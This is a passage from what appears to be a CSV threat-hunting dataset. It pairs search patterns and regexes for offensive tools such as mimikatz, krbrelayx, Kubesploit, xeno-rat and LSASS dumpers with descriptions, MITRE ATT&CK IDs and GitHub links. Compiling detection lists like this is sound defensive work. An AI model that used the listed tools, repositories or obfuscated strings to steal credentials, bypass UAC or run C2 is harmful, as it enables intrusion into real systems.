TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*krbrelayx.py*",".{0,1000}krbrelayx\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*krbrelayx-master*",".{0,1000}krbrelayx\-master.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*krbroast-pcap2hashcat.py*",".{0,1000}krbroast\-pcap2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*KRBSCM: Will use the currently loaded Kerberos Service Ticket to create a new service running as SYSTEM*",".{0,1000}KRBSCM\:\sWill\suse\sthe\scurrently\sloaded\sKerberos\sService\sTicket\sto\screate\sa\snew\sservice\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KRBUACBypass 1*",".{0,1000}KRBUACBypass\s1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*KRBUACBypass.csproj*",".{0,1000}KRBUACBypass\.csproj.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*KRBUACBypass.exe*",".{0,1000}KRBUACBypass\.exe.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*KRBUACBypass.sln*",".{0,1000}KRBUACBypass\.sln.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*ktsuss-lpe.sh*",".{0,1000}ktsuss\-lpe\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*kubeletAttack.json*",".{0,1000}kubeletAttack\.json.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Kubesploit Agent*",".{0,1000}Kubesploit\sAgent.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitAgent-Darwin*",".{0,1000}kubesploitAgent\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitAgent-Linux*",".{0,1000}kubesploitAgent\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploit-main*",".{0,1000}kubesploit\-main.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Darwin*",".{0,1000}kubesploitServer\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Linux*",".{0,1000}kubesploitServer\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubestroyer -t *",".{0,1000}kubestroyer\s\-t\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Kubestroyer@latest*",".{0,1000}Kubestroyer\@latest.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_linux_x64*",".{0,1000}kubestroyer_linux_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_macos_arm64*",".{0,1000}kubestroyer_macos_arm64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_macos_x64*",".{0,1000}kubestroyer_macos_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_windows_x64*",".{0,1000}kubestroyer_windows_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Kubestroyer-master*",".{0,1000}Kubestroyer\-master.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Kudaes/Elevator*",".{0,1000}Kudaes\/Elevator.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*kuhl_m_dpapi_chrome.c*",".{0,1000}kuhl_m_dpapi_chrome\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*kuhl_m_lsadump.c*",".{0,1000}kuhl_m_lsadump\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*kuhl_m_sekurlsa_nt6.c*",".{0,1000}kuhl_m_sekurlsa_nt6\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_nt6.h*",".{0,1000}kuhl_m_sekurlsa_nt6\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_packages.c*",".{0,1000}kuhl_m_sekurlsa_packages\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_packages.h*",".{0,1000}kuhl_m_sekurlsa_packages\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*kuhl_m_sekurlsa_utils.h*",".{0,1000}kuhl_m_sekurlsa_utils\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kwallet2john.py*",".{0,1000}kwallet2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kyleavery/AceLdr*",".{0,1000}kyleavery\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*kyleavery/inject-assembly*",".{0,1000}kyleavery\/inject\-assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*kyleavery/pendulum*",".{0,1000}kyleavery\/pendulum.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*'l', 's', 'a', 's', 's', '.', 'e', 'x', 'e'*",".{0,1000}\'l\',\s\'s\',\s\'a\',\s\'s\',\s\'s\',\s\'\.\',\s\'e\',\s\'x\',\s\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*'l','s','a','s','s','.','e','x','e'*",".{0,1000}\'l\',\'s\',\'a\',\'s\',\'s\',\'\.\',\'e\',\'x\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*L04DUr118(h00k*",".{0,1000}L04DUr118\(h00k.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI=*",".{0,1000}L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI\=.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*L0phtCrack*",".{0,1000}L0phtCrack.{0,1000}","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*l3m0n/WinPirate*",".{0,1000}l3m0n\/WinPirate.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*L3Vzci9iaW4vd2hvYW1p*",".{0,1000}L3Vzci9iaW4vd2hvYW1p.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*LABEL name=""Maitm""*",".{0,1000}LABEL\sname\=\""Maitm\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*label-implant *",".{0,1000}label\-implant\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Ladon * AllScan*",".{0,1000}Ladon\s.{0,1000}\sAllScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * CiscoScan*",".{0,1000}Ladon\s.{0,1000}\sCiscoScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OnlineIP*",".{0,1000}Ladon\s.{0,1000}\sOnlineIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 